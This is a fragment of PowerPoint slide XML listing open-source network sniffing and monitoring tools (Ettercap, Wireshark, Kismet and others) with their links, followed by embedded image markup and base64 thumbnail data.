              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://sourceforge.net/projects/aimsniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>Ettercap ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://ettercap.sourceforge.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wireshark (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://www.wireshark.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TCPDstat (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://github.com/netik/tcpdstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kismet (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>http://www.kismetwireless.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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Open Source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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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3554" name="Picture 2" descr="https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcQHiGgnqqTCVFPTCplGrn-9ueJ6qRnBOCQ-kXaTAMXlnVlr76HLjanfmYQ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72200" y="1047750"/>
            <a:ext cx="2133600" cy="653604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23556" name="AutoShape 4" descr="data:image/jpeg;base64,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AutoShape 6" descr="data:image/jpeg;base64,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"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="155575" y="-457200"/>
            <a:ext cx="2333625" cy="952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0" name="AutoShape 8" descr="data:image/jpeg;base64,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"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="155575" y="-457200"/>
            <a:ext cx="2333625" cy="952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34200" y="2114550"/>
            <a:ext cx="1371600" cy="65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AutoShape 11" descr="data:image/jpeg;base64,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